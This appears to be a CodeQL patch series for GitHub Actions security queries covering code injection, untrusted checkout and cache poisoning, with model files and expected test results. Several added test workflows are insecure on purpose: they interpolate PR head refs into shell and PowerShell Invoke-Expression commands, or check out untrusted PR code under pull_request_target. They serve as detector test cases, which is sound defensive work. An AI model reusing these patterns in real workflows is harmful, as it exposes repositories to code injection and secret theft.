b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a9c92e70ee5e..90b0a74d0ece 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -133,7 +133,11 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + step.getCallee() = + [ + "eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and this.getArgument("ref").regexpMatch(".*head_sha.*") and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..86ce17a9a9b5 --- /dev/null +++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml new file mode 100644 index 000000000000..8cdcabb2c117 --- /dev/null +++ b/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["eficode/resolve-pr-refs", "*", "output.head_ref", "branch", "manual"] + + diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..f288c615a351 --- /dev/null +++ b/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["gotson/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/lib/ext/manual/tj-actions_branch-names.model.yml b/ql/lib/ext/manual/tj-actions_branch-names.model.yml index 91f3c056e6de..56f017635ce9 100644 --- a/ql/lib/ext/manual/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/manual/tj-actions_branch-names.model.yml @@ -6,5 +6,3 @@ extensions: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] - diff --git a/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml new file mode 100644 index 000000000000..e4b34c37d70b --- /dev/null +++ b/ql/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSourceModel + data: + - ["xt0rted/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 18f72de36d11..b09473fc1321 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -619,12 +619,15 @@ scopes sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | | ahmadnassri/action-changed-files | * | output.json | json | manual | +| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | | amannn/action-semantic-pull-request | * | output.error_message | text | manual | | cypress-io/github-action | * | env.GH_BRANCH | branch | manual | | dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | +| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | | googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | +| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | | jitterbit/get-changed-files | * | output.added | filename | manual | | jitterbit/get-changed-files | * | output.added_modified | filename | manual | | jitterbit/get-changed-files | * | output.all | filename | manual | @@ -639,12 +642,12 @@ sources | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| tj-actions/branch-names | * | output.ref_branch | branch | manual | | trilom/file-changes-action | * | output.files | filename | manual | | trilom/file-changes-action | * | output.files_added | filename | manual | | trilom/file-changes-action | * | output.files_modified | filename | manual | | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | +| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | | xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml new file mode 100644 index 000000000000..cae9358e8b7d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test7.yml @@ -0,0 +1,20 @@ +name: Test +on: issue_comment +permissions: write-all +jobs: + test: + name: Test + runs-on: ubuntu-latest + steps: + - id: comment-branch + uses: xt0rted/pull-request-comment-branch@v2 + with: + repo_token: ${{ github.token }} + - id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ github.token }} + - run: | + echo "HEAD_REF1 from PR: ${{ steps.comment-branch.outputs.head_ref }}" + - run: | + echo "HEAD_REF2 from PR: ${{ steps.refs.outputs.head_ref }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index fdb5beb09aa0..f34915f45c21 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -340,6 +346,8 @@ subpaths | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index bd20179796e9..d919880e7264 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -65,6 +65,8 @@ edges | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -243,6 +245,10 @@ nodes | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | semmle.label | toJSON(github.event.comment.body).foo | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | semmle.label | Uses Step: comment-branch | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 1fd7c148a5e771ae5041ea0e5d34f2c57e1df3e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 25 Jun 2024 13:58:25 +0200 Subject: [PATCH 348/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aece8aacc5f5..761554c60e6d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.3 +version: 0.1.4 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 74678b945ca5..9ccc911594f5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.3 +version: 0.1.4 groups: [actions, queries] suites: codeql-suites extractor: javascript From e6311966c80fae7fdf43db6ff43c88600933d08e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 16:17:07 +0200 Subject: [PATCH 349/707] Take explicit permission into account for privilege calculation --- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++++-- .../CWE-349/.github/workflows/test20.yml | 46 +++++++++++++++++++ .../CWE-829/.github/workflows/test4.yml | 46 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 - .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 5 files changed, 118 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 8d965c3e4c71..2deb987650c8 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -848,11 +848,23 @@ class JobImpl extends AstNodeImpl, TJobNode { this.getPermissions().getAPermission().matches("%write") } + private predicate hasExplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getPermissions().getAPermission()) and + not this.getPermissions().getAPermission().matches("%write") + } + private predicate hasImplicitWritePermission() { // the job has an explicit write permission this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") } + private predicate hasImplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and + not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + } + private predicate hasRuntimeData() { exists(string path, string trigger, string name, string secrets_source, string perms | workflowDataModel(path, trigger, name, secrets_source, perms, _) and @@ -892,8 +904,7 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the action is privileged and externally triggerable. */ predicate isPrivilegedExternallyTriggerable() { - exists(EventImpl e | - this.getATriggerEvent() = e and + exists(EventImpl e | this.getATriggerEvent() = e | // job is triggereable by an external user e.isExternallyTriggerable() and // no matter if `pull_request` is granted write permissions or access to secrets @@ -903,9 +914,18 @@ class JobImpl extends AstNodeImpl, TJobNode { // job is privileged (write access or access to secrets) this.isPrivileged() or - // the trigger event is __normally__ privileged and we have no runtime data to prove otherwise + // the trigger event is __normally__ privileged + e.isPrivileged() and + // and we have no runtime data to prove otherwise not this.hasRuntimeData() and - e.isPrivileged() + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() + ) ) ) } diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml new file mode 100644 index 000000000000..a07f2922fd7a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test20.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml new file mode 100644 index 000000000000..a07f2922fd7a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -0,0 +1,46 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 0ff47fd2c53a..92d5a0b5ce18 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -4,6 +4,5 @@ | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index 544d26da9b74..5bf0e56e1b77 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,3 +1,5 @@ | .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 5cd292e23e034a593f1feac0f5bba0bac2c4666c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:17:37 +0200 Subject: [PATCH 350/707] Make Untrusted Checkout and CachePoisoning rules path-problems --- ql/src/Security/CWE-349/CachePoisoning.ql | 7 +- .../CWE-829/UntrustedCheckoutCritical.ql | 10 +- .../CWE-094/.github/workflows/test8.yml | 48 +++ .../CWE-094/CodeInjectionCritical.expected | 4 + .../CWE-094/CodeInjectionMedium.expected | 2 + .../Security/CWE-349/CachePoisoning.expected | 134 ++++++++- .../UntrustedCheckoutCritical.expected | 273 +++++++++++++++++- 7 files changed, 451 insertions(+), 27 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index feef43164614..2a9952ce07f5 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -1,7 +1,7 @@ /** * @name Cache Poisoning * @description The cache can be poisoned by untrusted code, leading to a cache poisoning attack. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 7.5 @@ -16,6 +16,8 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s where j.getATriggerEvent() = e and @@ -48,5 +50,4 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select checkout, "Potential cache poisoning in the context of the default branch on step $@.", s, - s.toString() +select s, checkout, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index eae580ebd528..b71b3cbba99e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -3,7 +3,7 @@ * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. - * @kind problem + * @kind path-problem * @problem.severity error * @precision very-high * @security-severity 9.3 @@ -17,12 +17,14 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LocalJob j, PRHeadCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, PRHeadCheckoutStep checkout, PoisonableStep s where j = checkout.getEnclosingJob() and j.getAStep() = checkout and // the checkout is followed by a known poisonable step - checkout.getAFollowingStep() instanceof PoisonableStep and + checkout.getAFollowingStep() = s and // the checkout is not controlled by an access check not exists(ControlCheck check | check.dominates(checkout)) and // the checkout occurs in a privileged context @@ -31,4 +33,4 @@ where or inPrivilegedExternallyTriggerableJob(checkout) ) -select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow." +select s, checkout, s, "Potential unsafe checkout of untrusted code on a privileged workflow." diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml new file mode 100644 index 000000000000..3b532e4cc672 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test8.yml @@ -0,0 +1,48 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - 'images/**' + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 + } diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f34915f45c21..1b98263c16e8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -348,6 +350,8 @@ subpaths | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | | .github/workflows/test7.yml:20:37:20:70 | 